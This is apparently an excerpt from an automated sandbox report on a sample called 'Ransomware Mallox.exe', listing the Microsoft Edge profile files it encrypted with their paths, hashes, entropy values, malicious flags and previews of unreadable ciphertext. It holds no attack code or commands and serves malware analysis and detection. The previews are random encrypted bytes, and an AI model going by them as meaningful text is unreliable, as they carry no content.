                    SHA-512:D9BF33A518936B9805B9009942278DCFFB2103E9FEC1D41784348E9811C88FFDFF5EC8011A1C66A9AA976BC489E5D3E454DEA22312969C6034109F78897B1397
                    Malicious:true
                    Preview:.../....I..}NA.-}B..."....4E..k/.F.....!M.....Qr.R.&.C{c..X......8_+...!ie}......%.7t...L.....KT....6.I9..]...P...Z.3.{..o......+...%...`~...x.Yy.~.Vh.6...h.1.(.E...T....;I`.n....(....2..W..b.4.....uQ}...xo..<.hd.?.W...2lG.q".I.(...x........C..f5=.......z..4.h....$Yc...../...z.'...'.n>.Q.$.F.....!..>e{.s.G.X.4,.w...9....b...~..+.w ......4......a.>.'.~.Cw.....)..g@.C..k.4..........?.h...64>_]../........D8R..hJG.~.@.....e.F.X2...N.].vw."...}..`@..V.{b...j.......U.~.i..}9%...D.2.c........Z.C....d...4.T!.......I.....W..2.).#^[...m.....t./.......N.-c..[(]...A.h...H...... ?&~0.&6;...E....d]~..$@N^....l.SG..-.T9v.H...f..^[..}...0..pP.>.I...@o?J.8JQ}e~i.......J..'8hzS'.Z..q.....7jfO.$.J.NI.^$n...V..Y.f..C^..`}..4......1.A..\h.@t.kG..d..E\H.a..J......Ar.=Q.6.!0.T.?Dr../l.y..g(F.9..i.......P....K.(i>......2.~..K.\.zu...l..W.....N0..rC.VE}.q.W.H.......9.......s+O*."0.vOm.0...N..J......9."u....%S...Cr+.7.).....X9.....,..~X.4aw.}.(t.8K1b.....K.....?

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.990838888135924
                    Encrypted:true
                    SSDEEP:384:VGXvihBK4Iol8XHEBLcclHESmZNQ2sBgS697tOcoJpiSDOfRk0OVA1:VSijK4D+HML3kTZUWSAB+DOfRt
                    MD5:5A909C7BE512F8AFAD0B6B06E4EFC864
                    SHA1:C5C2C5760CB8C2D901B15D92BA09121190314D69
                    SHA-256:278648863B49B0B9C55D50333A2A723615A4CCFA7EBC9ACEB5386D5ECC7BB0B5
                    SHA-512:9E91C5A69EB7A131166A8D3B65D8DD40191F428FDC8E89F3A6B2DBE422218F386BA8413E6CF1D048B89998DF517758CBDE9F72C6EBAD6FF1927547A6EC2C3E67
                    Malicious:true
                    Preview:?v.C.....F.<.*.,.xx!.Y).p. .}..z.\...Q}...J..^.5...=.9V.@m.n..L.3........h...[j}.....[. ..]".q.&...@ex.mF._..F.D.......z.....@s.1bE..Q9...^....s....4c&XQ.+e.......o..-..HQ.El..h.O...W.5`.N(.qW:.N .....}R;....c.?..J.^Q.>..%..7.{>.=.G....7L.......&..L..&.d..+.N.h........Itt]..EOy+..Sd..u..9:y.'..v...W .]...qF.qJ..6.x......c>@.q..#.I4W....]....'...0t.Q.......z.....d{.,f=.-+!uFf_.YU{...u.fT:*.S......4}..bGD.tD.3x.F`...6.......-^.l@~.7.*....s.CP&.\.'Dz.e..|....j..k.1.....T.Z..r...#d...9.w .....K.....|...Xn.............=y.48.{k...hI.&$.i.d...il..7....=.T..^.B%....LA..0.w.3..z.v....W.CB=Z|.J...d..V~....:...j.Q/Q....K..;..*u~.+.>.J..".w9...,..$...U....Z...C..;.9...x:.,*.H..`.R.O.l?+......!.z..%C&;....?8...9f.....~.XE`..H..j1.\..=.f>p....{....Fy ....H.@..T.Th0......zS......rq#.\?.w.$!....P.1%..Z...u6*{.........4..%.+..+D......:.}E.Y.Kl..6.X......<..j.!n.=`j.#p..l.M.3.....Ol.."..K....fZ..KU1E.....V.MQ4..Z..[&.......X.B...[..=M6)...v.$.C...]Rg..Il

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):30184
                    Entropy (8bit):7.993753900034707
                    Encrypted:true
                    SSDEEP:768:ojtk4UZPvapIVyLZ/rsjy/ga6ditZqm6h4:4tRGPypIVyFDslk9V
                    MD5:3590A811AAB10C84BDE7B499D66EC4FF
                    SHA1:921738B115CA456616C9BA768E5809F4090F5534
                    SHA-256:8D538D662A48557456E5D4FDA143D56BEC2751E12F5668E4DB10644947F0040D
                    SHA-512:EDC08B6CA8D63AC9761EA3A1D7AC452D499E794899D5C67FEC038D579A378907F739905A18054A840C1E9CC0949127CA050EC39AE77F7BFDAD26C7504F528984
                    Malicious:true
                    Preview:.:....eB..Z.....\d...<....}.4.b...i..N"}X@.z.'.......^.3..oe.M....b..2<...-[..b9[.N..W.M....w.v..r..!..ef.P.&4`...S.6...W.]...jRO..Y.>.h^.{.v...-..%GsX.....5..g..E.p...u hN9.+..JL(.U.....=.......".].....g......b..v..m...C.....{.l...x...`cv..+4.Eh.s@H0.....x....jV.4...r.......<3j..?y_o..U..\...2.y..!...p.H.....%.e.?R...iHj9fl).J."...2.b).1.....KH.t..E..[.U4....z~E}..k.|4....".r1.^....xp....)...0.n*.I|...a..........<.. .....v.Np.Ag.....:...........)..z..66>.n..m.K._..6tLAR..q...(d.W.-w...=s&....9[..E.+...>..+V..{..D..r.i<.....}..d.-./E.....wS.i..n.dqP.6>..@>.^..jRd...a....=.....xS....0^?L.l... s....^!.p..d.I........l..Q........y...p`:...f..NT.>_".QKPn.W..AR.....s.s.;..CK..l....b.-..Ug....\..(t3`$.RN).0...Mo../R.#..>.....AI..D.?.Oz...$=.M....]....t.....q3...M.G..-.....t..U0..Knh"U.-._..|.=.?......Q.q....../........C...XJ.B..,..A..l..S.2Z.p......).}.O.|.....9x....0...l...p=.>...T|..|.....s..1MT 7......0.......'...t2.V&$JNk_....]...c.....dB..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999379902288092
                    Encrypted:true
                    SSDEEP:6144:HjSmfqNxCt4S66aDqv6QT9lY13qzajipmYTPgNklhpo:HjSmQCd19lLajipmYTPWIhpo
                    MD5:22C11E51BABEA74D7F30FB18BACF46A0
                    SHA1:0A465A4A45F3669363FD85E0447D6C7A5FCB686A
                    SHA-256:40D5E3514865B04168310A98B97041C44B4476418CA7048667F36B6C005C22C7
                    SHA-512:C21FBB411306744F5612C06119C1A594357FDD9B90D09B3AA3F0DEC657B91DC0CB37D03DC89B3C1E443F5B64093218F175C1F3EFC4D3089FC7B43F6093FBEB33
                    Malicious:false
                    Preview:7,m.K.0...|A..Y..9jI..~..HNYg<T,2B..:...y.oJ...@?.&.b.6";f.o+.w.l.Xm..5M.k...I.F~v.........w..(NO..RR.*.U...g..'.T.....]8.#...... j..iggX...../=...`.Lw"..z.J.$\R.`?*....S.C.1....4.c..ze.UNB.....0...?.%..v.oM.t..M.u...!..+:.&...t.1.......D_..#........'..4.......R.f.SF...#....<p..Un.-Gt..{..Z$f...E@...ytI.N~..y.xa_"../%...l..+.2..?.BZh.....!..1...e..8Q....|dGw.....w..."i~!2.4.oXC{.#.nlN...iH#QIA.L.fu.M..V./X...@.n.0=....J\@(..S.t*..^Q......w......d@....G......F...N..h.....>.M....*.. ..?t5O.........P?#}.F*.b=.......S.:.......%(.`...e.##.t- ..5...i...h..).....4.5.\.S~..M.BM........3.4U..x.:,......+3..g.B!.=...h@..QA....T..NA*...5.?.A*.....!.C...u.?9.1........t4....;..DE..B.;.T[..4.9..W,....H.5...0B}<.W.j..e.A.....A..x.....C8l.AK..%c..G.5.i...w.R...+...Zc..&k.gC.{<6......Ue2y.A.....R.....T..M.....V..Kg.dY...>"w.#.kEY.8..-5*+.g.......@o.....SR((....v3.4....1h`..k.../.......l>h...H.}3..,..vuC...\...r.8..b.....o...Wd*..$......*Wz...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):524764
                    Entropy (8bit):7.99968495661663
                    Encrypted:true
                    SSDEEP:12288:TcqnU/4b1N9jS+pHArGbLduNOokOd2sxrREeNz1unqkbt:OAECbLQNN/FRzXCBbt
                    MD5:7ABFD84FB74604BADF3688D537A807F0
                    SHA1:A125A0065EA69610C2F94BEC6106BA7045C7F9D0
                    SHA-256:02E29C4C733CB3A477D1DD61955E41C05142CC322B9EF93D7588968B45B43129
                    SHA-512:35C8A56A9171CB2B5DF5058CAE770CCADE4BFEEFECD60A1E34C86839AC1A2DF3E0E6D5C1CBD747ACD2CBCE089CAA316AB3B48D4F38E1BF7092438F91A22567A0
                    Malicious:false
                    Preview:$fi G...$.@&6r...4t].m.n...........:K.O%...J2....N|z......#......b....|Z@C......C.XH&.:h\3.+....q.f....:V.r..Q..u ..h...E.UC..e...f...}.y...i4...h.s.!.!.m.y..^.....N ...t..8PwI..H..&..`.....)....r8DO......q;y:.EA...qE.;...$l.....Ftn..u|.........8.N.;....Ti.L..~.....n.......e.#...^..T~..j:.;~X..7.;[C.U..x..,.<.~.J...t.....)4...........rY.20....l....>.5P..c...,...ly-..L.S.....|...0..t...zZ...>.*..3k..."%..v..;..gP).5r.k....../.;P..M..."Q.W..}.q..^.2...I./|.}./a..2.&y.j....x..r...!4i./.p.y.i.T..._Ch:N...._.[......@n..V5.Si..'.O.v<.K..m....].$h.w..*.-.r.M.E.X..,.M..&H....1.}.Q.@.P.)..>.gc.N.-..8W.4...$wL..i0...~.}...W.........b..6)....>..j......W.#.u.*P..In......%....:."Qrwu.i...j...l...3.kC..Q..dO...e.7*^..DMq,.C..E...I..!.~..z[..j.q....7........7u..Z.*.*.*,.;......z;..+......$m.]..3F.....F.,<F./............)3Tr......'o..8...R... h..<....*.WC.=Nu.jn.].m.X..8[.7c..8.n=.ZD.3.....P..\.......O!<..S.ms*Zup..e.0.........S..!.V......c.G.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999302188324575
                    Encrypted:true
                    SSDEEP:6144:QAL5dBWSB84aukR7RZCRoOdzIiU3GG7SnIjPeXwyXjQHnmH:QCn84vkX09dzZUWArMdXjgmH
                    MD5:8BEF4EBEAC8B485263E5903FF6C84026
                    SHA1:DE98947C2FC72C4387380561C4FAB0B99B74E564
                    SHA-256:7F06FDEF0F4C98CE652EE377129363D09AE75E336DA65902DAD00A75C6125C61
                    SHA-512:C3E041F4AC8F9393E220717192E8DFECFE37861962EC770A80E8325EC20C31AFA40C94109DC681C4CA8CE9E44C63FE1524EEDE2CB0B9AB1F6651D018CFC92838
                    Malicious:true
                    Preview:...@.j.9..X....:.as..q...9.=t2w;..Zvb.r..M.'.qF.....p.P.U.TY....fu.....F...0...,.......f...2..I.<l..RW.\.V.`N......).sI.z..g)}.....(.$...G.....F..c...'g.^..8...:.M..... ..',./aG)..9...F.g9.S..>e...f.....'QE..k.j{...6Eq..h$k...........9.ju..Z.%.7...m4Y...M..6...$....3.7.J.h'?.V..\7..w...*`;...G(..y..~Ub..T.elnx.........'Df....T._...(Y_..9.....%}3H...d.\q.x..e.........-.H)~jf.3.40..p......3.W..y.Up....F........:..v.2.}.F.f...........fK.8.!.....vs..u.. O ..q.y.@..@:b$)e{.E.=...E..S(.|1C.M...U.f...@.$k..#H..?a.7z.-..g.@... 6..ib.3-.K............Q..Z.>.B=S2..5........0.<..z.B"...L.. p=i.+t.{.O....Q..RZ&r..4.3..N.M......#...]........^.Q^.......d..F,>.9.r.....~.q..yM<.d..U,...i..........#,......L......!..w....8..wD..m.qIj...fW.3....rN.....`.h!.*.$..u.\.....0...;.&.*.:.L.nEg....b.5D...6...N.EeZ..............Y... <F.f...!.L!..6...WlD[..l. ........VG.......k.....%.U".'Wl)....fe^...x.k....X.LrQ.AZ1q.X4.w....N<.E.C4k.[.(L.+..=&..;p.].._.Dj.).d.W]

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.99929807992235
                    Encrypted:true
                    SSDEEP:6144:uOcjXgOeHJBQASmoHTrUfj1fX+FCyNdfzEktn8r8POC:uOA5eHQAfOFC8d7Ekt8rW
                    MD5:9E8DC1126D3F5C51F51AE4EBD4A884BF
                    SHA1:94384F8486BBB591D43BEABEC04C7886C2BBF520
                    SHA-256:C656877BD53C614B7E3D5599BDB7203A3F304C9DA21CDE7778AF7676A723B549
                    SHA-512:3695CE4BA6A63BC5FAC7DFB63EB414571E94B6A5F58A61FD70B1E1226CE6C1AB226BF1337A7613BE87D3F99F8BC53736A4925ED085B550A79B0A0B1A4026DF07
                    Malicious:true
                    Preview:.m.u..,.u....6.....k.?...s.<.\.O...+.......Z.{2..Uv..o.........Or...Z7....(_>....A..t&.-.Ov.......HB9.v......s...a.`L..'.p.........5.em.....2e.....l..sh.].^.H..K....6<..Uo5k......4...m..e.w?.6.|...6J....J^..R.@.t"..Pt..a."..w.`....lO...,.v.9...b._..=y...g........p.V.;m.z`.S.....#.o..*/_.......3.K.D...rU.gW`...Y.9.T..s.;..9...m...f..-.........I...*!7.jZ)+. ..7.Y.......@U.So:;Y.X.14...x.s..cs...D.hV..`.z...3...*...R..`a...<.r...*...d...a..-.H.....:...af}..wU...D1....H...../'..XT.|).Q.kv..K#.,P?.|.ysjv..S.$.W9....+....g.U.L.8.t...J...D..b....R......2..K.{W.\`4Tv\...[ {...}?...&.j9...a.....q)|.M ..^..AwZh..E.;`..za.1$...K.|7.<y..|...`'r.r.c..).x..w.j..../..c..(=..r3...nD.t.W.\c.z.JoC..H..+....CAw!.;).!..#S.D.T...f5........B$....W...1I..*.I1.. ....Mf.B.C....].....:R0..|.......V.....C..\................$.*..Y<hF...p4~...x..{.x...Z..d.D.F.....W.=..XxU.pe.R.*Q.k|.)...[..K.g...];..a^...q.....!.%..T....k3.....!..h9s....S9...#.....b'~..`LB.J.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999384599869517
                    Encrypted:true
                    SSDEEP:6144:wdNGJ5qejv/k8k8UuxXfEW4D/T3WDEpXUhME3ePwZC:w7O5fbkJ8UmP63WABUisez
                    MD5:78B4AED692BF31C0D3AF8CFCEE32CF01
                    SHA1:A53F107A92D3E4A80578FEF2A50C58A9A8264E6D
                    SHA-256:B68878F187BD0374C660446387C1A2CD6648E6C9FF1EF5FFEF2CA2D5F835A927
                    SHA-512:C5CA9BE12CD698C26A3AAB764A5650F8881F88249E24EEAEBE4509F62F03E7702DADA10F8DC0B06A6F305235AA9D1A169DC8DE6A6400012C6A3CCBBB274B7C80
                    Malicious:true
                    Preview:.O.[w .n,M...[.g.z.3Y..k.F|...D.....y.V......~.~D4H...;.ff.....A_.$!....-u......{.@.........H.MW.Z........V[.r...c..^..q....@m....Q...pz.1.P7.<IlV..X...x....y...3^`..1...H...,/;..?...0.U..Dle......S........Hu.e..,.......i.<b.~.hz."...a..w..K......xH.h....kMj|c...^...h....w]..]...0. ....m..A2..M3.....(P....1J.....41.R|.r...^LP....o..=0...MH.-/...w...=.-..6g..t...f..3.....kj.0..eI.j:^..... .s:V~*..(t[J..K.&q.V.N....z....."R.........x..b.U.B.L2.]>.}.....$...6.g.8.r.b.#...l.GA.pq.q..V\p....qB..^y..~........b..EK(b..=...n..!....`-<.o...3...c...f<. (q.7.'......T.z..l...^H....YM..J.\>U...$"..'.Tn...../.Y..."'3y....c...c.=.%Ok....6`..........R.....t..',s&.K......!.O.......f.0]..2.{)......S@Ae..-....x.Re..i[M......pZ...j...)...tD.........`1..L{..L.v..@....-n.|...=[e..........,...3.....O1...>....%..T^.. 0..c(......e;..[z......U....~s..88?.....Q...Zo.i..[...QqyT7.z}.E.......B..u.]...3.........L..2F_.k.P.>X...?.....)J..]Xyq.R.CR.xEL...RW..9

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.999247163463315
                    Encrypted:true
                    SSDEEP:3072:vl8wOuWe43ShGaljjADNf4udkHsfnOktIMpKyFelvAhA5h4bklxR3KOR2GoFDn:vl9kSh3lxyOkCNhS+R3f2VFDn
                    MD5:FB5AAA5F40E1D74F324B3D4AE1207823
                    SHA1:3062788441E0F10DB96750CDA32C3ADF0BB3E2FC
                    SHA-256:E8B043DEDED67B80F739130126A1BD3B7E1E32277106D1C6E313910F8DC25816
                    SHA-512:E0775E34D4F8089142F931D3C205FD8B9EE9FC12ACF8259E97808B1BA976FA58EEDDB781001AE9360BE294E3CEE2722C50250C23BE475C24FD1FD64073956F41
                    Malicious:true
                    Preview:...R.O.].}..y.|......F.....|.....2A...w.e....c..y.S.o..=.&q.:8.. ....ybGa....v[.M..x......aX...<Np.F8..B8.a7Vf1.S...... .2.b.C..s1In...[.V.>>.....Q.b..k.G..}..3.o..g.....Z..^...;..Co.Gj.MV...+..As.D).K.r..2.?.-.Qy.(.../.._..2.4..Z.W..Yg...Z..J........c.... ..l............:K.*k!..k.M...@..n...........8..M.....6....;....."J.Q..T|L{...Sk.........!.6M"(.....>.W.....3.....Z9..X.w.....,1..:..2)1....K.%..yg...0....A.I8l.ei1.j.x...A...EZ...ty.#.B..A....w..\D.a.....Q.........{N$......,..8.*X.....B..........._."9He.1odBt.5`@%.....1.].L.=\.....S...+...lV>....Y..1.k#.i....X..:..i.2F$...5.+. .q.$-.W...k..p..~..B...FY...jw".e...KO......h....H..6....c..^.:#.P.........s1Z.Wd/......q.\Y`M.....~..7.-..M...X..z.....7.|..o8...Z...<...^}/D.6..f"D[I....d~x...o.f.L....a..i%7s....'.z..l.W......4.M.T......S.Q.Bu..8.Mq...S.<...S.F..\*.^...4....XRmt<.......e6.._s32.\..2.....\.R.6f..:r..C....{.{V..Q...scE..NoY8\..u..$9.i.......7.z.G.j.=..{Pf.....\.;Yrm

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36972
                    Entropy (8bit):7.995028169002615
                    Encrypted:true
                    SSDEEP:768:ac3+MQO8BvH5cccC/H4wP31bmllAia9Tn6ATj5DHecCo18fIAX:aG+NO8ZH5cnC/HJRoAia9Tn/PVhnAX
                    MD5:20F67B87734B867F8254263DCB28CA06
                    SHA1:1C3564607E12FBF28F0FB0A31FC877C1D8BC2729
                    SHA-256:0F08C21569A2E3C1858E57A5FC15FC28858F50E9D5340E0317D6A9126AFF2926
                    SHA-512:F3BBB08D2476BE53816692F6C4A6ADA3272EB1E41137A2A9677C1AEBCE7A7AE5E06B3DBA3C4B4F4A95FC04F487FE40547070DFE3B59516EC5B858C96579C0979
                    Malicious:true
                    Preview:4[..n.O.|n{....,.....&(T].M}&%....g..d{=..........vt.F..fO.u...W=.kP..*.$...Wy...Ra...]..<!#.oA..o.9...D.a_.!.'#.n...H....}.^.~?....c.O.\...Q..C3i...}`.\0.`c.E`..>.p...M}r.x....[....''.Y..........MU..X.1...YTW!........h-.g\.d..c....#"`0.|.+................jy._.A....Ml;.P.L..k...{.~m.U:..W8...c`..C.p'|*.GJJ.4......_....U..t?..J..O.....9.B,.{yb.2N..;.Mdx...T....,...)......9...H....<..+a...[].|..*.....l..^?.W......Kt.zY.@..Uy..f.......2J.n.R.5.Mc.wG.>r.0..E..-..1t........5b..-.^oM_....9..RE..1.!UIf.x*~e.y-..r..o.?.U.q|....c..,..l..]=....K.^sM$..o+).z..dzK.H..r..;.z. W..^m.S:.w_.Ur........].F...m.Oh.,......g......5.@A...sL..v.h...L.Wo.].......(i3j.E...KR$_y...u...o...R+.j..\..2.Am6.B./7.`.....AF..N...@..7.a.W..z!E...M.c..?v....Zp.&F...%.....{...#8....8@B.......*.v/QJ....._\...f..W>..@o..z.F}.G.;{O.|..@...(.......woK_j..[...x..4qg.5eg.e.......>.z.0...cy...........T4...9......C.m<Q.!<.\H..b\....B..ne.v...r..6=U.Ju.t~(.f..M.s.O;.o!.qT!.B.KBW..2.m

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36972
                    Entropy (8bit):7.9947078880706055
                    Encrypted:true
                    SSDEEP:768:vm4eSR6zV8kW3Kc+x87yRuKmtnhOCfBD0biEN3U7WD+4Emog4hFJrrOIM61:vm4bMVp6+e7yRuK+DnEN3noZhbrrPM61
                    MD5:A1C57975C84B2EC43B87665BA4010410
                    SHA1:BAA55E224B1DADEAD7E50157CC41493834CF8D7B
                    SHA-256:2F2023882F51AC8CAF80586384AFE9F0FF0E9A7D12E31C9A96DE62019F69B610
                    SHA-512:C1B82A6079852BED2D70332EADE29365F558E86A596BADA957102B84F2ADC1E18491041AE82C3C73DFA03F86586B6DB99429303054DF488766C276655211618F
                    Malicious:true
                    Preview:#4F..%0:..Wm.=.lj..]G4..!...%.W.Qq.ba.0.|.).1...o~..&.B..T........5{....9..#o..2...../.c?!.."......:.07+...2....>.....L.X~..}N..=f.m..h5....H....x1.(D..[<..H.......W...p.GhT..N.-&....]..F.K[.A..`..\.....u_.nP$...~[...+......<..^..<pQ.z5.f.fO6o...AI....a T...^Jg....N.}....Z.T.d)....z.I.0.n.t..F....3..TW......_:....o...gj.\...D......f.%.5..4.'.%[P...}....Z~..= .P>...&.p.C...y..C...m*..iQG.".l`...Y.5...mw.......+.....E'.O.i...4....J.k.Iq0..\/.,.)&M.&.R..*.7..W..p..t.'es....a.:.x...,qJ..o#.POp....rq....{Pp.3B....n......N.o...F.?...'.. .0h....(.u.......X......8.9......7..,"..&.@b.....@.+g...j!.~|P..5.E.B.|o...<..Ye..H..b<qDL.]..D..3...".......'..+...5M.#t:....]t.){..b.J.D.j.........}@0M`d..N.J. ml0.....uq.7D.<.....B.....y. Z..L...k....n.V...#.C....3.]u<..b.1...o..8......v.Q...n.4Hx&.9w%..U.]Gg....n......%.....,.PR.-s......u....?.3m0....I..~...6&....:7.g.........Q.#..pX^...\.}....o=.z.;r^nGp.Qf..a.P.....d....P.Xmk#T;~.^.s..u.'.g.,.....A.\.:'N.2

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20588
                    Entropy (8bit):7.991340916665921
                    Encrypted:true
                    SSDEEP:384:1U+S0ZwSliq22DIJ+AEqUfOQF5TOjQpttkcAjo4cdRU0enpeQufy8/giZ+:1WGixo1qUfOqsitkm7UnEQ+yf++
                    MD5:965472C05E177228F06C24041ED98527
                    SHA1:D460F73424390FB91B00B700C052C1D9EF11CE62
                    SHA-256:9EF6450E482DC62E96D4FDF255AFAE90DCF9AC1B9A36DBA719AEAC4754D752B1
                    SHA-512:6315B31275AEED23D01526DABA9E35CE761782979A989CA03C0BA4EBAE7EDE82A9B42AD30EE251920A6D63C5910ADAB293A5765C969BD04144C878D86A26578F
                    Malicious:true
                    Preview:.._..c.....3........O-.....y..9.J..0..5..B.1'..m.h.4.n...M...X[....U.3....0..g.]...!E.>O..L...\h..^.l......+.......#l$.4.}n.5............QO.....x.<.]..._+.:.0h....W_.v.%/>.4...QW..=&'....i. m .\...G.J....E...(..j..E..G...*.W..D..w..(..A.]dZ.M....'...]........ ..........."W..".K..xso.y....(("5J..1=|...n]H..L^.2..O.a..u..{C..T.Gn..PL.......1.kO.....b.V../.9.r5e<q..:...G....`s~C=.a.K.A..&.Kz. .T`.$. .[..&..]2<.......z..@d.m..-..x.3..X=..A...r+K..d.T.....l...8....rg....}\..5K...T`.......,qi...({9.Q..3....Rp...'..6..W.&..X*.yw.8.s(..K.|......q/.?..aC..(..........Q..&.@C_...'..~..h9u.U.q...x.*T.....k....l#0KO..\.L..{.R:......<.1......S5.~r..^0._#.".....j..|....4L..v..6{..6'....H..!..&..t....^.s.>...2[.t....u....'Q.e......RO.u.".9.)4u...Cn..*..~:t...9={..I........s....K.}..b.6:|.[q.......}..p,..Xg..i..Q.f.$Oh.&.T.;)4..@.?3...r.O.M................q={...P.r4T.@.GRW...`P..w..)....v...T...2,.8Y.xL...qO.i..Vc......l.eq.........z_U.C.#G.B...sP.F~...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):131180
                    Entropy (8bit):7.998555575029045
                    Encrypted:true
                    SSDEEP:3072:vShuNanBSLj/RRCkX6j+PUK14lrhfsMf61wk:vShBsWkX6j+M++NUhyk
                    MD5:090D5DCEBFD0BBBBFF8BB1D7A3A057BB
                    SHA1:E4970D810DA617620095AAD16F7181A04DD18156
                    SHA-256:93EF0DF94DD1654E30FE1EF8BD64A9932ECBD92E3BA08061F8D6012434161E0A
                    SHA-512:56EE942BED0F19B5BFF409A4E291F3B009AB1AE117FF8C3F5C33C07F1B7A62C7C91A8B313DBED5E55C54512266C063D152F3F6997E74DD323ECB7111048AD42C
                    Malicious:true
                    Preview:.J4.]..'..*>5........;/...!.o.?...:tO.qz6M\..j.4h.q.........j...G...b_/.~..mv...... ..7.m..UX...8....._.ltr.Y..+o.....V.</Lk...7xt..&>....F2D.w....i+...|l.fM.4m......O.0.........%..;~....=......P....."....h\5!.Z.c...F.........=d...j......*.~...[......o.N.uC..r.H...LV}..:m?0.....>.g..AI./G..f.....:.o.M.&.d^@8..{>Cu.5s.t.M....J.R.....Y........sb%z.m.."...k...L......J......@.t.....8..F.~,..]..hA`x4Z......3C...'..I@.9..Z....MF.q=.gQ..........P....:|.&....f.t.[3....1.S.BxQ...O...d._*3E>6....M...;....@f..O...hL..9.L..%.{t.-..|..*s....t..r.\...'Z......o.tU+fU8.U '...E...YG.yZ%.n...!aG.7.,...o.A.)...^6..3.m..~o...e.9.g^.........i....[...../..3C}..[.>..v~,i.G.....`.i9t.U....o.........$d~._...P.U.v.P.......S....A.......*......m_`L.z..Gt...W..F..k'..../....rD;.....g.../.._..E.`..5uIVd.2 .X2.{..'..t..y#....... I}...6"..jK...!..l.>.'...nv.]z.8..^Q...Y.n.J.....v..x..hBb.....sGv..4~.+x..G.$..V...@^....8.@..k3..y.B.n5...;..L31...Sn./...:@. 5:DlA.,.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Vpn Tokens

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):28780
                    Entropy (8bit):7.993436802327989
                    Encrypted:true
                    SSDEEP:768:wCB8RZQcj0/XdN8sGfEBwObE0HOGAt0veQi5YjB:7B8byXdesQWwObEWZA+vyiB
                    MD5:71E3115011FF3D8402DFE553CA9C1AC9
                    SHA1:957108DE2035DA28FC8FBAA6E433FA2161992FEB
                    SHA-256:EFC3EE14623491FD529D008DB1E50A000BD876D06FE4982F5B4FCB307CA21A7D
                    SHA-512:D824912B53F6FEBAD392E67CD30AE869AB0F09679B6E2001CDB92B2317D2335D784CE4696FAE3C15F69D3115281D301DBA5D7ABA061D0266737C52B59351330D
                    Malicious:true
                    Preview:E....Q...>G.+Vz.b..8..pJ..A2.)Qx.@.+*pA.o...7AJ.Dv..W.YP!..MC,.KH.....;.G.+. .p&....B.a~'... 6IU...w.%.........."!...m.9.m..kR......^m.UZ|x..h.l.C6.....L..4..';-a.......1.`EU.\..[...|.............W....@...#p....)@i......B.@..5......[..0.o.....W&...O.Y.............5.JO...o.H.......^..Z#M/y*g...g&.Q.).E.oY.N......~.<......:..B.u.j-Q.h..X:..k{.4.G*...!Ne.!I[.....i...Y..N8..&....._Ah@....u..dM.X....oA.s....M.n\.gF....S(.p.g..pdX....\y......v...N.+.J..2.~s........U..p.....[b..|...5F391.;.^..!<.\....~..x;......x.X:Wi.Y#...I..w......c..,"6..mv.(...EY.q...\...2...B+."..F.&..C...X...B...+.%9.!..pU.jl....P..\..]........?.y..A#.Fp.r.n?~...S....@".v.7Q.....sa.`.T.8.......FH..$.U.G_p.z.z.......1^.-..Y....9^).5.ZdYc.k.:m.....K.......T..!1<qcx|+./...A......m..6m.pr...u...}...v.....y._v.....b..%......-.zp...V..!...t.8kE....Eb....%...../........E.}...!.W.u..".Z......M'.f8..UsGy]...u.NF...U%.p,.....|..mI.d...KuG.......=y..A*6.r..?W.B(.A.$J.6.V.NA....H.{

